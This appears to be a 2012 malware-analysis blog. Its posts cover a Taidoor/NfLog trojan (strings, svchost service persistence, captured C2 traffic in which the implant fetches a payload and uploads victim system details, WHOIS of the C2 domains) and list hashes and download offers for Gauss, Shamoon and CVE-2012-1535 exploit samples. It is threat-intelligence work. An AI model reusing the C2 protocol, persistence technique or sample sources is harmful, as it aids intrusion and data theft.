10006250: 'iphlpapi.dll',0
10006260: 'WS2_32.dll',0
10007014: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
10007058: 'Connection:close',0
1000706C: 'Cache-Control: max-age=259200',0
1000708C: 'Pragma: no-cache',0
100070A0: 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)',0
100070D4: 'Content-Type: application/octet-stream',0
100070FC: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*',0
10007138: 'Accept-Language: en-en',0
10007150: '%s%02x',0
1000715C: 'home.asp',0
10007168: 'index.css',0
10007174: 'index.jsp',0
10007180: 'index.php',0
1000718C: 'index.asp',0
1000719C: '/%s/%s/',0
100071A4: '%02d',0
100071AC: '%04d',0
100071B4: '%s_%s',0
100071BC: '%s:%d',0
100071C4: 'Content-Length:%d',0Dh,0Ah,0
100071D8: 'POST',0
100071E0: 'HTTP/1.1',0
100071EC: '%H:%M:%S',0
100071F8: '\*.*',0
10007210: 'Windows Infrared Port Monitor.',0
10007314: 'SvcHostDLL.exe',0
10007348: 'RegSetValueEx(ServiceDll)',0
10007364: 'ServiceDll',0
10007370: 'GetModuleFileName() get dll path',0
10007394: 'RegCreateKey(Parameters)',0
100073B0: 'Parameters',0
100073BC: 'SYSTEM\CurrentControlSet\Services\',0
100073E0: '%SystemRoot%\System32\svchost.exe -k netsvcs',0
10007410: 'OpenSCManager()',0
10007420: 'RegQueryValueEx(Svchost\netsvcs)',0
10007444: 'netsvcs',0
1000744C: 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost',0
10007484: 'WmdmPmSp',0
10007490: 'CT2.1',0
10007498: ' /c ',0
100074A0: '%ComSpec%',0
100074BC: 'Win9X',0
100074C4: 'WinNT',0
100074CC: 'Win2003',0
100074D4: 'WinXP',0
100074DC: 'Win2K',0
100074E4: 'Vista',0
100074EC: 'Unknow',0
10007974: 'Plugin_End',0
10007980: 'Plugin_Start',0
10007990: 'Plugin_Init',0
1000799C: 'Plugin_GetID',0
100079B0: ' /A /C ',0
100079B8: 'ComSpec',0
100079C8: '\IntelAMTPP.dll',0
100079DC: '\MSCDRUN.bat',0
100079EC: 'c:\Progra~1\common~1\Driver',0
10007A08: 'CommonProgramFiles',0
10007A28: ',RundllUninstall WmdmPmSp',0Dh,0Ah,0
10007A54: 'net stop WmdmPmSp',0Dh,0Ah,0

Traffic Download pcaps here (this is approximately 24 hours of activity)

ct.datangcun.com 67.198.146.130United StatesAS35908 VPLS Inc. d/b/a Krypt TVPLS Inc. d/b/a Krypt Technolog
www.mlitjcab.com 112.175.245.222Korea, Republic ofAS4766 Korea TelecomKorea Telecom
121.63.150.15 ChinaAS4134 ChinanetCHINANET HUBEI PROVINCE NETWORK

POST /NfLog/Nfile.asp HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)
Host: www.mlitjcab.com
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2012 04:55:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 67080
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD; path=/
Cache-control: private

67072..wMZ......................@...............................................!..L.!This program cannot be run in DOS mode.

$.......*h..n...n...n.......m.......o.......h.......o.......k.......j.......l...X/..m...n.......1+..b...1+..o...X/..c....)..o...Richn...................PE..L...._.P...........!....................................................................................................Y..
..............................................................
POST /NfLog/TTip.asp HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.mlitjcab.com
Content-Length: 8
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD

w.w.w...HTTP/1.1 200 OK
Date: Mon, 06 Aug 2012 04:55:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13
Content-Type: text/html
Cache-control: private

68.55.106.119POST /NfLog/NfStart.asp?ClientId=192.168.106.141%20<49d0>%2068.55.106.119&Nick=KH0710myk*&dtime=T:8-6-0-53 HTTP/1.1
Accept: */*
Use-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.mlitjcab.com
Content-Length: 36
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD

..............................9.9.9.HTTP/1.1 200 OK

Date: Mon, 06 Aug 2012 04:55:40 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Cache-control: private

POST /NfLog/NfHostInfo.asp?par=godata&ClientId=192.168.106.141%20<49d0>%2068.55.106.119 HTTP/1.1

Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.mlitjcab.com
Content-Length: 8601
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCARCDD=OKNPGCKDLEKEHBOHIHLCOMHD

8593....C:\WINDOWS\system32\ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : DellXT

Primary Dns Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Hybrid

IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : localdomain

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-50-56-3C-F6-41
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.106.141
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.106.2
DHCP Server . . . . . . . . . . . : 192.168.106.254
DNS Servers . . . . . . . . . . . : 192.168.106.2
Primary WINS Server . . . . . . . : 192.168.106.2
Lease Obtained. . . . . . . . . . : Monday, August 06, 2012 12:50:58 AM
Lease Expires . . . . . . . . . . : Monday, August 06, 2012 1:20:58 AM

C:\WINDOWS\system32\net start
These Windows services are started:
Application Layer Gateway Service
Bluetooth Support Service
COM+ Event System
Cryptographic Services
DCOM Server Process Launcher
[ shortened ] --------------------

..............................9.9.9.HTTP/1.1 200 OK
Date: Mon, 06 Aug 2012 05:11:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Cache-control: private

121.63.150.15 C2 re-transmission traffic

Registration Service Provided By: SHANGHAI BEST ORAY INFORMATION S&T CO., LTD.
Contact: +86.2062219000

C&C servers

mlitjcab.com
Registrant:
jiaxingkeji
jiaxingkeji (liuhaifeng06@hotmail.com)
haidian beijing
haiding
beijing,100080
AM
Tel. +86.1082545656
Fax. +86.1082545656

Creation Date: 2012-07-10 10:04:37
Expiration Date: 2013-07-10 10:04:37

Domain servers in listed order:
ns1.oray.net,ns2.oray.net

ct.datangcun.com
port:1353

Domain name: datangcun.com
Registrant Contact:
chj
haha ha xjc__smallcat@sohu.com
025-8084 fax: 025-8084
jiangsu nanjing
nanjing jiangsu 210046
CN

Historical data
Other domains registered under the same domain and their historical hosting
Some of them were C2s for Nflog over the past year or more.

liuhaifeng06@hotmail.com also registered

diaoyiku.net
thehappydoor.com
yunqizhang.net
zhuangyiku.net
daomeixiong.net
nalaner.net
boyiku.net
houdiao.net
jianyiku.net
feichaizhang.net
thehappydoor.net
saoyiku.net
maoyiku.net
embassyjp.com
seaairs.com
zhuangyiku.com
sheyiku.com
nalaner.com
saoyiku.com
diaoyiku.com
feichaizhang.com
boyiku.com
avgsafety.com
yunqizhang.com
tokyo-h0t.com
mlitjcab.com
trafficbusy.com
sheyiku.net

Hosting History

sheyiku.net
2011-05-03 New -none- 220.241.102.233
2012-05-14 Not Resolvable 220.241.102.233 -none-

trafficbusy.com
2005-12-19 New -none- 70.85.145.98
2006-01-28 Change 70.85.145.98 72.36.179.98
2006-12-13 Change 72.36.179.98 208.254.26.139
2007-03-03 Change 208.254.26.139 64.15.205.242
2007-03-10 Change 64.15.205.242 208.254.26.139
2007-11-02 Change 208.254.26.139 82.98.86.162
2008-12-22 Change 82.98.86.162 68.178.232.99
2009-02-02 Not Resolvable 68.178.232.99 -none-
2012-03-08 New -none- 84.16.228.113
2012-03-26 Change 84.16.228.113 118.140.12.50

mlitjcab.com
2012-07-11 New -none- 112.175.245.222
2012-07-13 Not Resolvable 112.175.245.222 -none-
2012-07-25 New -none- 112.175.245.222

tokyo-h0t.com
2012-07-05 New -none- 221.125.38.46

yunqizhang.com
We have no record of any IP changes.

avgsafety.com
2012-03-14 New -none- 67.198.171.67
2012-03-26 Not Resolvable 67.198.171.67 -none-

boyiku.com
2010-09-13 New -none- 127.0.0.1
2010-10-15 Not Resolvable 127.0.0.1 -none-
2011-04-10 New -none- 75.126.239.148
2012-05-14 Not Resolvable 75.126.239.148 -none-
2012-06-13 New -none- 199.59.241.216
2012-07-01 Change 199.59.241.216 199.59.241.214
2012-07-13 Change 199.59.241.214 199.59.241.207
2012-07-25 Change 199.59.241.207 199.59.241.203
2012-08-06 Change 199.59.241.203 199.59.241.188

feichaizhang.com
We have no record of any IP changes.

diaoyiku.com
2011-04-10 New -none- 75.126.219.26
2011-10-01 Change 75.126.219.26 98.126.113.27
2011-10-14 Change 98.126.113.27 174.139.232.195
2011-11-18 Change 174.139.232.195 216.83.63.147
2012-03-02 Change 216.83.63.147 174.36.84.190
2012-03-14 Change 174.36.84.190 42.208.58.126

saoyiku.com
We have no record of any IP changes.

nalaner.com
2007-03-02 New -none- 221.122.60.246
2007-05-20 Change 221.122.60.246 211.147.215.170
2008-03-02 Not Resolvable 211.147.215.170 -none-
2008-03-04 New -none- 218.5.78.85
2008-03-23 Change 218.5.78.85 209.62.72.189
2008-03-30 Not Resolvable 209.62.72.189 -none-
2008-05-06 New -none- 69.64.155.79
2008-05-11 Not Resolvable 69.64.155.79 -none-
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.111.96
2012-05-14 Not Resolvable 74.86.111.96 -none-
2012-06-17 New -none- 23.23.232.244
2012-06-20 Change 23.23.232.244 0.0.0.0

sheyiku.com
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.75.10
2011-11-29 Not Resolvable 74.86.75.10 -none-
2011-12-11 New -none- 74.86.75.10
2012-05-14 Not Resolvable 74.86.75.10 -none-

zhuangyiku.com
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.111.105
2012-05-14 Not Resolvable 74.86.111.105 -none-

seaairs.com
2012-03-08 New -none- 84.16.228.113
2012-06-08 Change 84.16.228.113 113.28.117.42
2012-07-01 Change 113.28.117.42 221.125.38.46

embassyjp.com
2008-03-30 New -none- 209.62.21.228
2008-04-06 Not Resolvable 209.62.21.228 -none-
2012-03-14 New -none- 84.16.228.113
2012-03-26 Change 84.16.228.113 27.131.32.132
2012-04-19 Change 27.131.32.132 27.131.32.128

maoyiku.net
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 75.126.194.228
2011-10-01 Change 75.126.194.228 98.126.113.27
2011-10-14 Change 98.126.113.27 174.139.232.195
2011-11-18 Change 174.139.232.195 216.83.63.147
2012-03-02 Change 216.83.63.147 174.36.84.190
2012-03-14 Change 174.36.84.190 54.235.225.45
2012-07-13 Change 54.235.225.45 174.139.132.37

saoyiku.net
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 76.73.43.158
2012-05-14 Not Resolvable 76.73.43.158 -none-

thehappydoor.net
We have no record of any IP changes.

feichaizhang.net
We have no record of any IP changes.

jianyiku.net
2011-03-30 New -none- 76.73.43.158
2011-04-10 New -none- 74.86.111.103
2011-10-01 Not Resolvable 74.86.111.103 -none-
2011-11-06 New -none- 216.83.41.85
2011-11-18 Change 216.83.41.85 216.83.63.155
2011-12-22 Not Resolvable 216.83.63.155 -none-
2012-01-03 New -none- 216.83.63.155
2012-05-14 Not Resolvable 216.83.63.155 -none-

houdiao.net
2011-04-10 New -none- 174.139.250.234
2012-05-14 Not Resolvable 174.139.250.234 -none-

boyiku.net
2011-04-10 New -none- 76.73.43.158
2011-04-21 Change 76.73.43.158 220.241.102.233
2011-09-05 Not Resolvable 220.241.102.233 -none-
2011-09-18 New -none- 220.241.102.233
2012-05-14 Not Resolvable 220.241.102.233 -none-

nalaner.net
We have no record of any IP changes.

daomeixiong.net
2009-09-24 New -none- 97.74.178.59
2009-12-24 Change 97.74.178.59 97.74.207.59
2010-04-01 Change 97.74.207.59 97.74.95.91
2010-04-24 Change 97.74.95.91 98.126.2.148
2010-05-14 Change 98.126.2.148 98.126.40.36
2010-09-03 Change 98.126.40.36 98.126.2.148
2010-09-13 Change 98.126.2.148 183.99.121.199
2010-10-15 Change 183.99.121.199 183.99.121.124
2010-11-06 Not Resolvable 183.99.121.124 -none-
2011-04-10 New -none- 174.139.250.234
2012-05-14 Not Resolvable 174.139.250.234 -none-
2012-06-20 New -none- 68.178.232.100

zhuangyiku.net
We have no record of any IP changes.

yunqizhang.net
We have no record of any IP changes.

3. 240727.xls

Clean decoy set.xls:

Payload ews.exe: 63d7ad4f9a5e8ede0218bad6e8d5c2e6 dropper for Trojan Taidoor (see Contagio for the same trojan)

SSDeep 3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/nGpOiz3EX:dbL6vr7ZtpxBbi636Ls0b6P4O4K

7A0D5BB0CA9992826BAD0B2241C4992B

File: ews.exe Size: 12800 MD5: 63D7AD4F9A5E8EDE0218BAD6E8D5C2E6

↧

Gauss samples - Nation-state cyber-surveillance + Banking trojan

August 9, 2012, 9:35 pm

≫ Next: 3322 Dyndns badness

≪ Previous: CVE-2012-0158 generated "8861 password" XLS samples and analysis

Just a quick post for those who can't sleep until get to play with Gauss

Here is a great paper by Kaspersky Gauss:Abnormal Distribution

and the blogpost: "Gauss: Nation-state cyber-surveillance meets banking Trojan"

Excerpt:
The highest number of infections is recorded in Lebanon, with more than 1600 computers affected. The Gauss code (winshell.ocx) contains direct commands to intercept data required to work with Lebanese banks – including the Bank of Beirut, Byblos Bank and Fransabank.

In Israel and the Palestinian Territory, 750 incidents have been recorded." (Kaspersky)

Download

Download all the files listed below as a password protected archive (email me if you need the password)

List of files

List of files for download:

├───devwiz.ocx

│ CBB982032AED60B133225A2715D94458_devwiz.ocx

│

├───dskapi.ocx

│ 08D7DDB11E16B86544E0C3E677A60E10_100-dskapi.ocx

│ 23D956C297C67D94F591FCB574D9325F_100-dskapi.ocx

│

├───mcdmn.ocx

│ 9CA4A49135BCCDB09931CF0DBE25B5A9-mcdmn.ocx

│

├───smdk.ocx

│ 5604A86CE596A239DD5B232AE32E02C6_smdk.ocx

│ 90F5C45420C295C73067AF44028CE0DD_smdk.ocx

│

├───windig.ocx

│ DE2D0D6C340C75EB415F7263388351

25_windig.ocx

│

└───winshell.ocx

4FB4D2EB303160C5F419CEC2E9F57850_winshell.ocx

7AC2799B5337B4BE54E5D5B03B214572_winshell.ocx

EF6451FDE3751F698B49C8D4975A58B5_winshell.ocx

↧

3322 Dyndns badness

August 12, 2012, 11:46 am

≫ Next: CVE-2012-1535 - 7 samples and info

≪ Previous: Gauss samples - Nation-state cyber-surveillance + Banking trojan

MD5

118f208998e12561b03200178edf826bmembers.3322.orgPRORAT
c5ac14a3c80b3c6af4c943e0f3839fbelengkusky1.3322.orgKeylogger
03ac85edb00bcd8c6b4981ca67208f68sfwu.3322.org
003212079a7c1de92b755a627f3913b7sfwu.3322.org
c5a632a8e369e47a7e8f55f892c8d864myyuming55.3322.org
c5a6de01e10c65a8894bcb32608055b5yjdl.3322.orgPuppetzombie.gen
8a41d4770858cb5af6860f95c00f8224myyuming55.3322.orgVirut
fe7d3e20d7bc640fe2edf645da218bd1xinxin169.3322.org

↧

CVE-2012-1535 - 7 samples and info

August 16, 2012, 10:37 pm

≫ Next: Shamoon or DistTrack.A samples

≪ Previous: 3322 Dyndns badness

I was still writing my analysis when Alienvault posted CVE-2012-1535: Adobe Flash being exploited in the wild and mine would be pretty much the repeat of the same. I don't like repeating so I will just post the samples and link to Jaime Biasco's article. As you see from SSDeep they are nearly identical in size, exploit, and payload. All Word documents were authored by "Mark" and have same strings and indicators present as in the analyzed file.

CVE #

CVE-2012-1535

Unspecified vulnerability in Adobe Flash Player before 11.3.300.271 on Windows and Mac OS X and before 11.2.202.238 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted SWF content, as exploited in the wild in August 2012 with SWF content in a Word document.

Download

Download all the files listed below

List of files

Note nearly identical ssdeep

919708b75b1087f863b6b49a71eb133d
MedalTop10.doc MedalTop10.doc
3072:hHNqm9x2CAUTfK4TSwQ59LJWKMFjBKFyimr9VZf2y6:htqAcCAUDK4TVoxJXKjBKFyXr9VZS
------------------------------------------------------
c0c83fe9f21560c3be8dd13876c11098
page 1-2.doc
3072:hHNqm9x2CAUTaK4TSwQ59LJWKMFjBKFy+w1KIeLwhtqAcCAU2K4TVoxJXKjBKFy+vw
------------------------------------------------------
65090678746d74b4f32cc5977e2bad95
tickets.doc
3072:hHNqm9x2CAUTMKFThwQ59LJWKMFjBKFN4tBYVglzIeLwhtqAcCAUIKFTioxJXKjBKFN4tOVgzw
------------------------------------------------------
d512d9544907a3589eba64f196aec0d7
TYBRIN Project Review Report_Aug 12.doc
3072:hHNqm9x2CAUTkKAbTLwQ59LJWKMFjBKFyabQlzIeLw:htqAcCAUIKSTUoxJXKjBKFyabQzw
------------------------------------------------------
8b47310c168f22c72a263437f2d246d0
Message_from_PerInge.doc
3072:hHNqm9x2CAUT5KAbTLwQ59LJWKMFjBKFyabQlzIeLwhtqAcCAU1KSTUoxJXKjBKFyabQzw
------------------------------------------------------
ad3aa76dd54f6be847b927855be16c61
Running Mate.doc
3072:hHNqm9x2CAUTDKRTnwQ59LJWKMFjBKFaeoLzIeLw:htqAcCAUXKRTwoxJXKjBKFaeoNw
------------------------------------------------------
7e3770351aed43fd6c5cab8e06dc0300
iPhone 5 Battery.doc
3072:hHNqm9x2CAUTuKRTnwQ59LJWKMFjBKFS/JEVglzIeLw:htqAcCAUCKRTwoxJXKjBKFShEVgzw

------------------------------------------------------

Automatic scans

919708b75b1087f863b6b49a71eb133d
MedalTop10.doc

SHA256:     2904c0f9786253e4a7327e816cbbb173274f056d074ad8259f79af2216363333
SHA1:     c0a8ce03dc262ddef0c8a74b4619f17ba164b9d7
MD5:     919708b75b1087f863b6b49a71eb133d
File size:     291.5 KB ( 298496 bytes )
File type:     MS Word Document
Tags:     cve-2012-1535 doc exploit
Detection ratio:     9 / 42
Analysis date:     2012-08-17 02:20:33 UTC ( 2 hours, 57 minutes ago )
AhnLab-V3     Dropper/Cve-2012-1535     20120816
Avast     SWF:CVE-2012-1535 [Expl]     20120816
Commtouch     MSWord/SWFDropper.A!Camelot     20120817
GData     SWF:CVE-2012-1535     20120817
Kaspersky     Exploit.SWF.Agent.gq     20120817
Microsoft     Exploit:SWF/ShellCode.G     20120817
nProtect     Exploit/W32.CVE-2012-1535.298496.B     20120816
Sophos     Troj/SwfExp-BB     20120817
TrendMicro-HouseCall     -     20120817
ViRobot     SWF.A.EX-Agent.298496     20120816

c0c83fe9f21560c3be8dd13876c11098

page 1-2.doc

SHA256:     5332fec6d0dc326718152e8c17125ba44f1e4c2c0e8659fc671758501274d0f2
SHA1:     f0280d29b42aefeb46555af39af651780001e749
MD5:     c0c83fe9f21560c3be8dd13876c11098
File size:     291.5 KB ( 298496 bytes )
File name:     page 1-2.doc
File type:     MS Word Document
Tags:     cve-2012-1535 doc exploit
Detection ratio:     14 / 42
Analysis date:     2012-08-16 14:21:44 UTC ( 14 hours, 58 minutes ago )
AhnLab-V3     Dropper/Cve-2012-1535     20120816
Avast     SWF:CVE_2012_1535 [Expl]     20120816
BitDefender     Exploit.Shellcode.AV     20120816
Commtouch     MSWord/SWFDropper.A!Camelot     20120816
Emsisoft     Exploit.SWF.Shellcode!IK     20120816
F-Secure     Exploit.Shellcode.AV     20120816
Fortinet     W32/Baddoc.B!tr     20120816
GData     Exploit.Shellcode.AV     20120816
Ikarus     Exploit.SWF.Shellcode     20120816
Kaspersky     Exploit.SWF.Agent.gq     20120816
Microsoft     Exploit:SWF/ShellCode.G     20120816
nProtect     Exploit/W32.CVE-2012-1535.298496.C     20120816
Sophos     Troj/SwfExp-BB     20120816
Symantec     Trojan.Mdropper     20120816

65090678746d74b4f32cc5977e2bad95
tickets.doc
SHA256:    b88996c2b43400a3ddbaa7f28889f06e85f088e6213ed45fb08b1ada835eb563
SHA1:    8e455149a77006b2ddf2150451a24bc841bae434
MD5:    65090678746d74b4f32cc5977e2bad95
File size:    291.5 KB ( 298496 bytes )
File type:    MS Word Document
Detection ratio:    8 / 42
Analysis date:    2012-08-17 05:24:51 UTC ( 0 minutes ago )
AhnLab-V3    Dropper/Cve-2012-1535    20120816
Avast    SWF:CVE-2012-1535 [Expl]    20120816
Commtouch    MSWord/SWFDropper.A!Camelot    20120817
GData    SWF:CVE-2012-1535    20120817
Kaspersky    Exploit.SWF.Agent.gq    20120817
Microsoft    Exploit:SWF/ShellCode.G    20120817
Sophos    Troj/SwfExp-BB    20120817
Symantec    Trojan.Mdropper    20120817

d512d9544907a3589eba64f196aec0d7
TYBRIN Project Review Report_Aug 12.doc
SHA256:     9ebbafd859ccdd87bebf9562d4d15eef05ddc5f939e77e03d2e40591328558da
SHA1:     893b8ddafc1f127f189a439bef5f1e9f46caaeda
MD5:     d512d9544907a3589eba64f196aec0d7
File size:     291.5 KB ( 298496 bytes )
File name:     TYBRIN Project Review Report_Aug 12.cod
File type:     MS Word Document
Detection ratio:     0 / 42
Analysis date:     2012-08-13 23:20:32 UTC ( 3 days, 6 hours ago )

8b47310c168f22c72a263437f2d246d0
Message_from_PerInge.doc
SHA256:     d5ad0a664731e1dee43c493c92bf8db2bd6831cf0bd15f89b65e0bbb4a72b35b
SHA1:     f58d019756ba41b117f070c8acb9addba6b119fc
MD5:     8b47310c168f22c72a263437f2d246d0
File size:     291.5 KB ( 298496 bytes )
File name:     Message_from_PerInge.doc
File type:     MS Word Document
Detection ratio:     0 / 39
Analysis date:     2012-08-13 12:36:18 UTC ( 3 days, 16 hours ago )

ad3aa76dd54f6be847b927855be16c61
Running Mate.doc
n/a

7e3770351aed43fd6c5cab8e06dc0300
iPhone 5 Battery.doc
SHA256:    742db588c3cfa416215619db34e168be58846058f7528adee8358bb8b8b68fe3
SHA1:    b4562ef0cd54234374ff9d24e0d1b01c1db5e873
MD5:    7e3770351aed43fd6c5cab8e06dc0300
File size:    291.5 KB ( 298496 bytes )
File name:    file-4380428_
File type:    MS Word Document
Tags:    cve-2012-1535 doc exploit
Detection ratio:    15 / 42
Analysis date:    2012-08-17 02:10:07 UTC ( 3 hours, 21 minutes ago )
AhnLab-V3    Dropper/Cve-2012-1535    20120816
Avast    SWF:CVE-2012-1535 [Expl]    20120816
Commtouch    MSWord/SWFDropper.A!Camelot    20120817
Emsisoft    Exploit.SWF.Shellcode!IK    20120817
ESET-NOD32    SWF/Exploit.CVE-2012-1535.A    20120816
F-Prot    CVE2012153    20120817
GData    SWF:CVE-2012-1535    20120817
Ikarus    Exploit.SWF.Shellcode    20120817
Kaspersky    Exploit.SWF.Agent.gq    20120817
Microsoft    Exploit:SWF/ShellCode.G    20120817
nProtect    Exploit/W32.CVE-2012-1535.298496    20120816
Sophos    Troj/SwfExp-BB    20120817
Symantec    Trojan.Mdropper    20120817
TrendMicro    TROJ_MDROP.EVL    20120817
TrendMicro-HouseCall    -    20120817
ViRobot    DOC.S.CVE-2012-1535.298496    20120816

↧

Shamoon or DistTrack.A samples

August 16, 2012, 11:25 pm

≫ Next: DeepEnd Research: Java 7 0-Day vulnerability information and mitigation.

≪ Previous: CVE-2012-1535 - 7 samples and info

Image from Kaspersky lab

Here are a couple of Shamoon samples. Such destructive malware is rare because it does not really make much sense to destroy computers when you can steal data or use them.

Download

Download all the files listed below

Additional file Aug 20, 2012 (many thanks to anonymous)
41f13811fa2d4c41b8002bfb2554a286

File info

d214c717a357fe3a455610b197c390aa

trksvr.exe
24576:XfzZdE5gNLKg98gJWLVFpafKo2Ebzm3qLZdEEOg+fVRo2Ebzz

http://webcache.googleusercontent.com/search?q=cache:7wSVG1tPsP0J:www.threatexpert.com/report.aspx%3Fmd5%3Dd214c717a357fe3a455610b197c390aa+d214c717a357fe3a455610b197c390aa&cd=2&hl=de&ct=clnk&gl=de

http://www.sophos.com/fr-fr/threat-center/threat-analyses/viruses-and-spyware/Troj~Mdrop-ELD/detailed-analysis.aspx

b14299fd4d1cbfb4cc7486d978398214

trksvr.exe
12288:Xfz3ZXNPcwmGWdCCg98gJWGG2EbzXHlk3qBUb7UbXfzZdE5Ng98gJWb2Ebzm3q

http://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Mdrop-ELD/detailed-analysis.aspx

PE info
UninitializedDataSize     : 0
InitializedDataSize       : 913408
ImageVersion              : 0.0
ProductName               : Microsoft   Windows   Operating System
FileVersionNumber         : 5.2.3790.0
LanguageCode              : English (U.S.)
FileFlagsMask             : 0x003f
FileDescription           : Distributed Link Tracking Server
CharacterSet              : Unicode
LinkerVersion             : 10.0
FileOS                    : Windows NT 32-bit
MIMEType                  : application/octet-stream
Subsystem                 : Windows command line
FileVersion               : 5.2.3790.0 (srv03_rtm.030324-2048)
TimeStamp                 : 2012:08:10 00:46:22+02:00
FileType                  : Win32 EXE
PEType                    : PE32
InternalName              : Distributed Link Tracking Server
ProductVersion            : 5.2.3790.0
SubsystemVersion          : 5.1
OSVersion                 : 5.1
OriginalFilename          : trksvr
LegalCopyright            :    Microsoft Corporation. All rights reserved.
MachineType               : Intel 386 or later, and compatibles
CompanyName               : Microsoft Corporation
CodeSize                  : 84480
FileSubtype               : 0
ProductVersionNumber      : 5.2.3790.0
EntryPoint                : 0x892b
ObjectFileType            : Executable application

PE Signature
============
Publisher                 : Microsoft Corporation
Product                   : Microsoft_ Windows_ Operating System
Internal name             : Distributed Link Tracking Server
Copyright                 : (c) Microsoft Corporation. All rights reserved.
Original name             : trksvr
File version              : 5.2.3790.0 (srv03_rtm.030324-2048)
Description               : Distributed Link Tracking Server

https://www.securelist.com/en/blog?SSL=1#

ASCI strings

File: D214C717A357FE3A455610B197C390AA
MD5: d214c717a357fe3a455610b197c390aa
Size: 989184

Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
string too long
invalid string position
Schedule
JobAdd
vector<T> too long
ios_base::eofbit set

ios_base::failbit set
ios_base::badbit set
bad locale name
bad cast
c:\windows\temp\out17626867.txt
kijjjjnsnjbnncbknbkjadc
kjsdjbhjsdbhfcbsjkhdf jhg jkhg hjk hjk
slkdfjkhsbdfjbsdf
klsjdfjhsdkufskjdfh
generic
iostream
system
iostream stream error
Unknown exception
bad allocation
CorExitProcess
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Visual C++ CRT: Not enough memory to complete call to strerror.
bad exception
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
Illegal byte sequence
Directory not empty
Function not implemented
No locks available
Filename too long
Resource deadlock avoided
Result too large
Domain error
Broken pipe
Too many links
Read-only file system
Invalid seek
No space left on device
File too large
Inappropriate I/O control operation
Too many open files
Too many open files in system
Invalid argument
Is a directory
Not a directory
No such device
Improper link
File exists
Resource device
Unknown error
Bad address
Permission denied
Not enough space
Resource temporarily unavailable
No child processes
Bad file descriptor
Exec format error
Arg list too long
No such device or address
Input/output error
Interrupted function call
No such process
No such file or directory
Operation not permitted
No error
UTF-8
UTF-16LE
UNICODE
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
